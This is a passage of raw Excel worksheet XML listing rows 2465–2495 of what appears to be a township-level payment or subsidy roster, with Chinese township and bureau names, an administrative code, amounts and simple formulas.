      <c r="AFY2464" s="6"/>
      <c r="AFZ2464" s="6"/>
      <c r="AGA2464" s="6"/>
      <c r="AGB2464" s="6"/>
      <c r="AGC2464" s="6"/>
      <c r="AGD2464" s="6"/>
      <c r="AGE2464" s="6"/>
      <c r="AGF2464" s="6"/>
      <c r="AGG2464" s="6"/>
      <c r="AGH2464" s="6"/>
      <c r="AGI2464" s="6"/>
      <c r="AGJ2464" s="6"/>
      <c r="AGK2464" s="6"/>
      <c r="AGL2464" s="6"/>
      <c r="AGM2464" s="6"/>
      <c r="AGN2464" s="6"/>
      <c r="AGO2464" s="6"/>
      <c r="AGP2464" s="6"/>
      <c r="AGQ2464" s="6"/>
      <c r="AGR2464" s="6"/>
      <c r="AGS2464" s="6"/>
      <c r="AGT2464" s="6"/>
      <c r="AGU2464" s="6"/>
      <c r="AGV2464" s="6"/>
      <c r="AGW2464" s="6"/>
      <c r="AGX2464" s="6"/>
      <c r="AGY2464" s="6"/>
      <c r="AGZ2464" s="6"/>
      <c r="AHA2464" s="6"/>
      <c r="AHB2464" s="6"/>
      <c r="AHC2464" s="6"/>
      <c r="AHD2464" s="6"/>
      <c r="AHE2464" s="6"/>
      <c r="AHF2464" s="6"/>
      <c r="AHG2464" s="6"/>
      <c r="AHH2464" s="6"/>
      <c r="AHI2464" s="6"/>
      <c r="AHJ2464" s="6"/>
      <c r="AHK2464" s="6"/>
      <c r="AHL2464" s="6"/>
      <c r="AHM2464" s="6"/>
      <c r="AHN2464" s="6"/>
      <c r="AHO2464" s="6"/>
      <c r="AHP2464" s="6"/>
      <c r="AHQ2464" s="6"/>
      <c r="AHR2464" s="6"/>
      <c r="AHS2464" s="6"/>
      <c r="AHT2464" s="6"/>
      <c r="AHU2464" s="6"/>
      <c r="AHV2464" s="6"/>
      <c r="AHW2464" s="6"/>
      <c r="AHX2464" s="6"/>
      <c r="AHY2464" s="6"/>
      <c r="AHZ2464" s="6"/>
      <c r="AIA2464" s="6"/>
      <c r="AIB2464" s="6"/>
      <c r="AIC2464" s="6"/>
      <c r="AID2464" s="6"/>
      <c r="AIE2464" s="6"/>
      <c r="AIF2464" s="6"/>
      <c r="AIG2464" s="6"/>
      <c r="AIH2464" s="6"/>
      <c r="AII2464" s="6"/>
      <c r="AIJ2464" s="6"/>
      <c r="AIK2464" s="6"/>
      <c r="AIL2464" s="6"/>
      <c r="AIM2464" s="6"/>
      <c r="AIN2464" s="6"/>
      <c r="AIO2464" s="6"/>
      <c r="AIP2464" s="6"/>
      <c r="AIQ2464" s="6"/>
      <c r="AIR2464" s="6"/>
      <c r="AIS2464" s="6"/>
      <c r="AIT2464" s="6"/>
      <c r="AIU2464" s="6"/>
      <c r="AIV2464" s="6"/>
      <c r="AIW2464" s="6"/>
      <c r="AIX2464" s="6"/>
      <c r="AIY2464" s="6"/>
      <c r="AIZ2464" s="6"/>
      <c r="AJA2464" s="6"/>
      <c r="AJB2464" s="6"/>
      <c r="AJC2464" s="6"/>
      <c r="AJD2464" s="6"/>
      <c r="AJE2464" s="6"/>
      <c r="AJF2464" s="6"/>
      <c r="AJG2464" s="6"/>
      <c r="AJH2464" s="6"/>
      <c r="AJI2464" s="6"/>
      <c r="AJJ2464" s="6"/>
      <c r="AJK2464" s="6"/>
      <c r="AJL2464" s="6"/>
      <c r="AJM2464" s="6"/>
      <c r="AJN2464" s="6"/>
      <c r="AJO2464" s="6"/>
      <c r="AJP2464" s="6"/>
      <c r="AJQ2464" s="6"/>
      <c r="AJR2464" s="6"/>
      <c r="AJS2464" s="6"/>
      <c r="AJT2464" s="6"/>
      <c r="AJU2464" s="6"/>
      <c r="AJV2464" s="6"/>
      <c r="AJW2464" s="6"/>
      <c r="AJX2464" s="6"/>
      <c r="AJY2464" s="6"/>
      <c r="AJZ2464" s="6"/>
      <c r="AKA2464" s="6"/>
      <c r="AKB2464" s="6"/>
      <c r="AKC2464" s="6"/>
      <c r="AKD2464" s="6"/>
      <c r="AKE2464" s="6"/>
      <c r="AKF2464" s="6"/>
      <c r="AKG2464" s="6"/>
      <c r="AKH2464" s="6"/>
      <c r="AKI2464" s="6"/>
      <c r="AKJ2464" s="6"/>
      <c r="AKK2464" s="6"/>
      <c r="AKL2464" s="6"/>
      <c r="AKM2464" s="6"/>
      <c r="AKN2464" s="6"/>
      <c r="AKO2464" s="6"/>
      <c r="AKP2464" s="6"/>
      <c r="AKQ2464" s="6"/>
      <c r="AKR2464" s="6"/>
      <c r="AKS2464" s="6"/>
      <c r="AKT2464" s="6"/>
      <c r="AKU2464" s="6"/>
      <c r="AKV2464" s="6"/>
      <c r="AKW2464" s="6"/>
      <c r="AKX2464" s="6"/>
      <c r="AKY2464" s="6"/>
      <c r="AKZ2464" s="6"/>
      <c r="ALA2464" s="6"/>
      <c r="ALB2464" s="6"/>
      <c r="ALC2464" s="6"/>
      <c r="ALD2464" s="6"/>
      <c r="ALE2464" s="6"/>
      <c r="ALF2464" s="6"/>
      <c r="ALG2464" s="6"/>
      <c r="ALH2464" s="6"/>
      <c r="ALI2464" s="6"/>
      <c r="ALJ2464" s="6"/>
      <c r="ALK2464" s="6"/>
      <c r="ALL2464" s="6"/>
      <c r="ALM2464" s="6"/>
      <c r="ALN2464" s="6"/>
      <c r="ALO2464" s="6"/>
      <c r="ALP2464" s="6"/>
      <c r="ALQ2464" s="6"/>
      <c r="ALR2464" s="6"/>
      <c r="ALS2464" s="6"/>
      <c r="ALT2464" s="6"/>
      <c r="ALU2464" s="6"/>
      <c r="ALV2464" s="6"/>
      <c r="ALW2464" s="6"/>
      <c r="ALX2464" s="6"/>
      <c r="ALY2464" s="6"/>
      <c r="ALZ2464" s="6"/>
      <c r="AMA2464" s="6"/>
      <c r="AMB2464" s="6"/>
      <c r="AMC2464" s="6"/>
    </row>
    <row r="2465" customHeight="1" spans="1:11">
      <c r="A2465" s="23" t="s">
        <v>6514</v>
      </c>
      <c r="B2465" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2465" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="D2465" s="24" t="s">
        <v>6515</v>
      </c>
      <c r="E2465" s="24" t="s">
        <v>6516</v>
      </c>
      <c r="F2465" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2465" s="24">
        <v>2</v>
      </c>
      <c r="H2465" s="25">
        <v>325</v>
      </c>
      <c r="I2465" s="24">
        <f t="shared" si="38"/>
        <v>650</v>
      </c>
      <c r="J2465" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2465" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2466" customHeight="1" spans="1:11">
      <c r="A2466" s="23" t="s">
        <v>6517</v>
      </c>
      <c r="B2466" s="24" t="str">
        <f>B2465</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2466" s="24" t="str">
        <f>C2465</f>
        <v>白土岗镇</v>
      </c>
      <c r="D2466" s="30" t="s">
        <v>6518</v>
      </c>
      <c r="E2466" s="30" t="s">
        <v>6519</v>
      </c>
      <c r="F2466" s="170" t="str">
        <f>F2465</f>
        <v>411321122001</v>
      </c>
      <c r="G2466" s="24"/>
      <c r="H2466" s="24"/>
      <c r="I2466" s="24">
        <f t="shared" si="38"/>
        <v>0</v>
      </c>
      <c r="J2466" s="24"/>
      <c r="K2466" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2467" customHeight="1" spans="1:11">
      <c r="A2467" s="23" t="s">
        <v>6520</v>
      </c>
      <c r="B2467" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2467" s="24" t="s">
        <v>5332</v>
      </c>
      <c r="D2467" s="24" t="s">
        <v>6521</v>
      </c>
      <c r="E2467" s="24" t="s">
        <v>6522</v>
      </c>
      <c r="F2467" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2467" s="24">
        <v>1</v>
      </c>
      <c r="H2467" s="25">
        <v>365</v>
      </c>
      <c r="I2467" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2467" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2467" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2468" customHeight="1" spans="1:11">
      <c r="A2468" s="23" t="s">
        <v>6523</v>
      </c>
      <c r="B2468" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2468" s="24" t="s">
        <v>5332</v>
      </c>
      <c r="D2468" s="24" t="s">
        <v>6524</v>
      </c>
      <c r="E2468" s="24" t="s">
        <v>6525</v>
      </c>
      <c r="F2468" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2468" s="24">
        <v>1</v>
      </c>
      <c r="H2468" s="24">
        <v>420</v>
      </c>
      <c r="I2468" s="24">
        <f t="shared" si="38"/>
        <v>420</v>
      </c>
      <c r="J2468" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2468" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2469" customHeight="1" spans="1:11">
      <c r="A2469" s="23" t="s">
        <v>6526</v>
      </c>
      <c r="B2469" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2469" s="24" t="s">
        <v>6079</v>
      </c>
      <c r="D2469" s="24" t="s">
        <v>6527</v>
      </c>
      <c r="E2469" s="24" t="s">
        <v>1135</v>
      </c>
      <c r="F2469" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2469" s="24">
        <v>1</v>
      </c>
      <c r="H2469" s="25">
        <v>365</v>
      </c>
      <c r="I2469" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2469" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2469" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2470" customHeight="1" spans="1:11">
      <c r="A2470" s="23" t="s">
        <v>6528</v>
      </c>
      <c r="B2470" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2470" s="24" t="s">
        <v>6079</v>
      </c>
      <c r="D2470" s="24" t="s">
        <v>3062</v>
      </c>
      <c r="E2470" s="24" t="s">
        <v>3022</v>
      </c>
      <c r="F2470" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2470" s="24">
        <v>1</v>
      </c>
      <c r="H2470" s="25">
        <v>365</v>
      </c>
      <c r="I2470" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2470" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2470" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2471" customHeight="1" spans="1:11">
      <c r="A2471" s="23" t="s">
        <v>6529</v>
      </c>
      <c r="B2471" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2471" s="24" t="s">
        <v>6291</v>
      </c>
      <c r="D2471" s="24" t="s">
        <v>6530</v>
      </c>
      <c r="E2471" s="24" t="s">
        <v>479</v>
      </c>
      <c r="F2471" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2471" s="24">
        <v>2</v>
      </c>
      <c r="H2471" s="25">
        <v>325</v>
      </c>
      <c r="I2471" s="24">
        <f t="shared" si="38"/>
        <v>650</v>
      </c>
      <c r="J2471" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2471" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2472" customHeight="1" spans="1:11">
      <c r="A2472" s="23" t="s">
        <v>6531</v>
      </c>
      <c r="B2472" s="24" t="str">
        <f>B2471</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2472" s="24" t="str">
        <f>C2471</f>
        <v>外贸局</v>
      </c>
      <c r="D2472" s="24" t="s">
        <v>6532</v>
      </c>
      <c r="E2472" s="23" t="s">
        <v>6533</v>
      </c>
      <c r="F2472" s="170" t="str">
        <f>F2471</f>
        <v>411321122001</v>
      </c>
      <c r="G2472" s="24"/>
      <c r="H2472" s="24"/>
      <c r="I2472" s="24">
        <f t="shared" si="38"/>
        <v>0</v>
      </c>
      <c r="J2472" s="24"/>
      <c r="K2472" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2473" customHeight="1" spans="1:11">
      <c r="A2473" s="23" t="s">
        <v>6534</v>
      </c>
      <c r="B2473" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2473" s="24" t="s">
        <v>6374</v>
      </c>
      <c r="D2473" s="24" t="s">
        <v>6535</v>
      </c>
      <c r="E2473" s="24" t="s">
        <v>6536</v>
      </c>
      <c r="F2473" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2473" s="24">
        <v>2</v>
      </c>
      <c r="H2473" s="25">
        <v>325</v>
      </c>
      <c r="I2473" s="24">
        <f t="shared" si="38"/>
        <v>650</v>
      </c>
      <c r="J2473" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2473" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2474" customHeight="1" spans="1:11">
      <c r="A2474" s="23" t="s">
        <v>6537</v>
      </c>
      <c r="B2474" s="24" t="str">
        <f>B2473</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2474" s="24" t="str">
        <f>C2473</f>
        <v>工信局</v>
      </c>
      <c r="D2474" s="30" t="s">
        <v>6538</v>
      </c>
      <c r="E2474" s="30" t="s">
        <v>2467</v>
      </c>
      <c r="F2474" s="170" t="str">
        <f>F2473</f>
        <v>411321122001</v>
      </c>
      <c r="G2474" s="24"/>
      <c r="H2474" s="24"/>
      <c r="I2474" s="24">
        <f t="shared" si="38"/>
        <v>0</v>
      </c>
      <c r="J2474" s="24"/>
      <c r="K2474" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2475" customHeight="1" spans="1:11">
      <c r="A2475" s="23" t="s">
        <v>6539</v>
      </c>
      <c r="B2475" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2475" s="24" t="s">
        <v>6374</v>
      </c>
      <c r="D2475" s="24" t="s">
        <v>6540</v>
      </c>
      <c r="E2475" s="24" t="s">
        <v>6541</v>
      </c>
      <c r="F2475" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2475" s="24">
        <v>2</v>
      </c>
      <c r="H2475" s="25">
        <v>325</v>
      </c>
      <c r="I2475" s="24">
        <f t="shared" si="38"/>
        <v>650</v>
      </c>
      <c r="J2475" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2475" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2476" customHeight="1" spans="1:11">
      <c r="A2476" s="23" t="s">
        <v>6542</v>
      </c>
      <c r="B2476" s="24" t="str">
        <f>B2475</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2476" s="24" t="str">
        <f>C2475</f>
        <v>工信局</v>
      </c>
      <c r="D2476" s="23" t="s">
        <v>6543</v>
      </c>
      <c r="E2476" s="23" t="s">
        <v>6544</v>
      </c>
      <c r="F2476" s="170" t="str">
        <f>F2475</f>
        <v>411321122001</v>
      </c>
      <c r="G2476" s="24"/>
      <c r="H2476" s="24"/>
      <c r="I2476" s="24">
        <f t="shared" si="38"/>
        <v>0</v>
      </c>
      <c r="J2476" s="24"/>
      <c r="K2476" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2477" customHeight="1" spans="1:11">
      <c r="A2477" s="23" t="s">
        <v>6545</v>
      </c>
      <c r="B2477" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2477" s="24" t="s">
        <v>6374</v>
      </c>
      <c r="D2477" s="24" t="s">
        <v>6546</v>
      </c>
      <c r="E2477" s="24" t="s">
        <v>6547</v>
      </c>
      <c r="F2477" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2477" s="24">
        <v>1</v>
      </c>
      <c r="H2477" s="25">
        <v>365</v>
      </c>
      <c r="I2477" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2477" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2477" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2478" customHeight="1" spans="1:11">
      <c r="A2478" s="23" t="s">
        <v>6548</v>
      </c>
      <c r="B2478" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2478" s="24" t="s">
        <v>6549</v>
      </c>
      <c r="D2478" s="24" t="s">
        <v>6550</v>
      </c>
      <c r="E2478" s="24" t="s">
        <v>6551</v>
      </c>
      <c r="F2478" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2478" s="24">
        <v>1</v>
      </c>
      <c r="H2478" s="24">
        <v>420</v>
      </c>
      <c r="I2478" s="24">
        <f t="shared" si="38"/>
        <v>420</v>
      </c>
      <c r="J2478" s="24" t="s">
        <v>4615</v>
      </c>
      <c r="K2478" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2479" customHeight="1" spans="1:11">
      <c r="A2479" s="23" t="s">
        <v>6552</v>
      </c>
      <c r="B2479" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2479" s="24" t="s">
        <v>6553</v>
      </c>
      <c r="D2479" s="24" t="s">
        <v>6554</v>
      </c>
      <c r="E2479" s="24" t="s">
        <v>6555</v>
      </c>
      <c r="F2479" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2479" s="24">
        <v>1</v>
      </c>
      <c r="H2479" s="25">
        <v>365</v>
      </c>
      <c r="I2479" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2479" s="24" t="s">
        <v>4615</v>
      </c>
      <c r="K2479" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2480" customHeight="1" spans="1:11">
      <c r="A2480" s="23" t="s">
        <v>6556</v>
      </c>
      <c r="B2480" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2480" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D2480" s="24" t="s">
        <v>6557</v>
      </c>
      <c r="E2480" s="24" t="s">
        <v>2215</v>
      </c>
      <c r="F2480" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2480" s="24">
        <v>1</v>
      </c>
      <c r="H2480" s="25">
        <v>365</v>
      </c>
      <c r="I2480" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2480" s="24" t="s">
        <v>6558</v>
      </c>
      <c r="K2480" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2481" customHeight="1" spans="1:11">
      <c r="A2481" s="23" t="s">
        <v>6559</v>
      </c>
      <c r="B2481" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2481" s="72" t="s">
        <v>3422</v>
      </c>
      <c r="D2481" s="72" t="s">
        <v>6560</v>
      </c>
      <c r="E2481" s="74" t="s">
        <v>6522</v>
      </c>
      <c r="F2481" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2481" s="24">
        <v>1</v>
      </c>
      <c r="H2481" s="25">
        <v>365</v>
      </c>
      <c r="I2481" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2481" s="41">
        <v>45566</v>
      </c>
      <c r="K2481" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2482" customHeight="1" spans="1:11">
      <c r="A2482" s="23" t="s">
        <v>6561</v>
      </c>
      <c r="B2482" s="24" t="s">
        <v>6486</v>
      </c>
      <c r="C2482" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2482" s="24" t="s">
        <v>6562</v>
      </c>
      <c r="E2482" s="24" t="s">
        <v>2600</v>
      </c>
      <c r="F2482" s="170" t="s">
        <v>6489</v>
      </c>
      <c r="G2482" s="24">
        <v>1</v>
      </c>
      <c r="H2482" s="25">
        <v>365</v>
      </c>
      <c r="I2482" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2482" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2482" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2483" customHeight="1" spans="1:11">
      <c r="A2483" s="23" t="s">
        <v>6563</v>
      </c>
      <c r="B2483" s="24" t="s">
        <v>6564</v>
      </c>
      <c r="C2483" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D2483" s="24" t="s">
        <v>6565</v>
      </c>
      <c r="E2483" s="24" t="s">
        <v>6566</v>
      </c>
      <c r="F2483" s="24" t="s">
        <v>6567</v>
      </c>
      <c r="G2483" s="24">
        <v>1</v>
      </c>
      <c r="H2483" s="25">
        <v>365</v>
      </c>
      <c r="I2483" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2483" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2483" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2484" customHeight="1" spans="1:11">
      <c r="A2484" s="23" t="s">
        <v>6568</v>
      </c>
      <c r="B2484" s="24" t="s">
        <v>6564</v>
      </c>
      <c r="C2484" s="24" t="s">
        <v>5332</v>
      </c>
      <c r="D2484" s="24" t="s">
        <v>6569</v>
      </c>
      <c r="E2484" s="24" t="s">
        <v>6570</v>
      </c>
      <c r="F2484" s="24" t="s">
        <v>6567</v>
      </c>
      <c r="G2484" s="24">
        <v>1</v>
      </c>
      <c r="H2484" s="25">
        <v>365</v>
      </c>
      <c r="I2484" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2484" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2484" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2485" customHeight="1" spans="1:11">
      <c r="A2485" s="23" t="s">
        <v>6571</v>
      </c>
      <c r="B2485" s="24" t="s">
        <v>6564</v>
      </c>
      <c r="C2485" s="24" t="s">
        <v>3443</v>
      </c>
      <c r="D2485" s="24" t="s">
        <v>6572</v>
      </c>
      <c r="E2485" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F2485" s="24" t="s">
        <v>6567</v>
      </c>
      <c r="G2485" s="24">
        <v>1</v>
      </c>
      <c r="H2485" s="25">
        <v>365</v>
      </c>
      <c r="I2485" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2485" s="41">
        <v>45566</v>
      </c>
      <c r="K2485" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2486" customHeight="1" spans="1:11">
      <c r="A2486" s="23" t="s">
        <v>6573</v>
      </c>
      <c r="B2486" s="24" t="s">
        <v>6564</v>
      </c>
      <c r="C2486" s="24" t="s">
        <v>6574</v>
      </c>
      <c r="D2486" s="24" t="s">
        <v>6575</v>
      </c>
      <c r="E2486" s="24" t="s">
        <v>6576</v>
      </c>
      <c r="F2486" s="170" t="s">
        <v>6567</v>
      </c>
      <c r="G2486" s="24">
        <v>1</v>
      </c>
      <c r="H2486" s="25">
        <v>365</v>
      </c>
      <c r="I2486" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2486" s="41">
        <v>45658</v>
      </c>
      <c r="K2486" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2487" customHeight="1" spans="1:11">
      <c r="A2487" s="23" t="s">
        <v>6577</v>
      </c>
      <c r="B2487" s="24" t="s">
        <v>6564</v>
      </c>
      <c r="C2487" s="24" t="s">
        <v>3443</v>
      </c>
      <c r="D2487" s="24" t="s">
        <v>6578</v>
      </c>
      <c r="E2487" s="24" t="s">
        <v>6579</v>
      </c>
      <c r="F2487" s="24" t="s">
        <v>6567</v>
      </c>
      <c r="G2487" s="24">
        <v>1</v>
      </c>
      <c r="H2487" s="25">
        <v>365</v>
      </c>
      <c r="I2487" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2487" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2487" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2488" customHeight="1" spans="1:11">
      <c r="A2488" s="23" t="s">
        <v>6580</v>
      </c>
      <c r="B2488" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="C2488" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="D2488" s="24" t="s">
        <v>6582</v>
      </c>
      <c r="E2488" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F2488" s="24" t="s">
        <v>6583</v>
      </c>
      <c r="G2488" s="24">
        <v>1</v>
      </c>
      <c r="H2488" s="25">
        <v>365</v>
      </c>
      <c r="I2488" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2488" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2488" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2489" customHeight="1" spans="1:11">
      <c r="A2489" s="23" t="s">
        <v>6584</v>
      </c>
      <c r="B2489" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="C2489" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="D2489" s="24" t="s">
        <v>6585</v>
      </c>
      <c r="E2489" s="24" t="s">
        <v>6586</v>
      </c>
      <c r="F2489" s="24" t="s">
        <v>6583</v>
      </c>
      <c r="G2489" s="24">
        <v>1</v>
      </c>
      <c r="H2489" s="25">
        <v>365</v>
      </c>
      <c r="I2489" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2489" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2489" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2490" customHeight="1" spans="1:11">
      <c r="A2490" s="23" t="s">
        <v>6587</v>
      </c>
      <c r="B2490" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="C2490" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="D2490" s="24" t="s">
        <v>6588</v>
      </c>
      <c r="E2490" s="24" t="s">
        <v>6589</v>
      </c>
      <c r="F2490" s="24" t="s">
        <v>6583</v>
      </c>
      <c r="G2490" s="24">
        <v>1</v>
      </c>
      <c r="H2490" s="25">
        <v>365</v>
      </c>
      <c r="I2490" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2490" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2490" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2491" customHeight="1" spans="1:11">
      <c r="A2491" s="23" t="s">
        <v>6590</v>
      </c>
      <c r="B2491" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="C2491" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="D2491" s="24" t="s">
        <v>6591</v>
      </c>
      <c r="E2491" s="24" t="s">
        <v>6592</v>
      </c>
      <c r="F2491" s="24" t="s">
        <v>6583</v>
      </c>
      <c r="G2491" s="24">
        <v>1</v>
      </c>
      <c r="H2491" s="25">
        <v>365</v>
      </c>
      <c r="I2491" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2491" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2491" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2492" customHeight="1" spans="1:11">
      <c r="A2492" s="23" t="s">
        <v>6593</v>
      </c>
      <c r="B2492" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="C2492" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="D2492" s="30" t="s">
        <v>6594</v>
      </c>
      <c r="E2492" s="31" t="s">
        <v>6595</v>
      </c>
      <c r="F2492" s="24" t="s">
        <v>6583</v>
      </c>
      <c r="G2492" s="24">
        <v>1</v>
      </c>
      <c r="H2492" s="25">
        <v>365</v>
      </c>
      <c r="I2492" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2492" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2492" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2493" customHeight="1" spans="1:11">
      <c r="A2493" s="23" t="s">
        <v>6596</v>
      </c>
      <c r="B2493" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="C2493" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="D2493" s="24" t="s">
        <v>6597</v>
      </c>
      <c r="E2493" s="24" t="s">
        <v>6598</v>
      </c>
      <c r="F2493" s="24" t="s">
        <v>6583</v>
      </c>
      <c r="G2493" s="24">
        <v>1</v>
      </c>
      <c r="H2493" s="25">
        <v>365</v>
      </c>
      <c r="I2493" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2493" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2493" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2494" customHeight="1" spans="1:11">
      <c r="A2494" s="23" t="s">
        <v>6599</v>
      </c>
      <c r="B2494" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="C2494" s="24" t="s">
        <v>6600</v>
      </c>
      <c r="D2494" s="24" t="s">
        <v>6601</v>
      </c>
      <c r="E2494" s="24" t="s">
        <v>6602</v>
      </c>
      <c r="F2494" s="24" t="s">
        <v>6583</v>
      </c>
      <c r="G2494" s="24">
        <v>1</v>
      </c>
      <c r="H2494" s="25">
        <v>375</v>
      </c>
      <c r="I2494" s="24">
        <f t="shared" si="38"/>
        <v>375</v>
      </c>
      <c r="J2494" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2494" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2495" customHeight="1" spans="1:11">
      <c r="A2495" s="23" t="s">
        <v>6603</v>
      </c>
      <c r="B2495" s="24" t="s">
        <v>6581</v>
      </c>
      <c r="C2495" s="24" t="s">
        <v>5332</v>
      </c>
      <c r="D2495" s="24" t="s">
        <v>6604</v>
      </c>
      <c r="E2495" s="24" t="s">
        <v>6605</v>
      </c>
      <c r="F2495" s="24" t="s">
        <v>6583</v>
      </c>
      <c r="G2495" s="24">
        <v>1</v>
      </c>
      <c r="H2495" s="25">
        <v>365</v>
      </c>
      <c r="I2495" s="24">
        <f t="shared" si="38"/>
        <v>365</v>
      </c>
      <c r="J2495" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2495" s="24" t="s">
        <v>225</v>
      </c>
    </row>
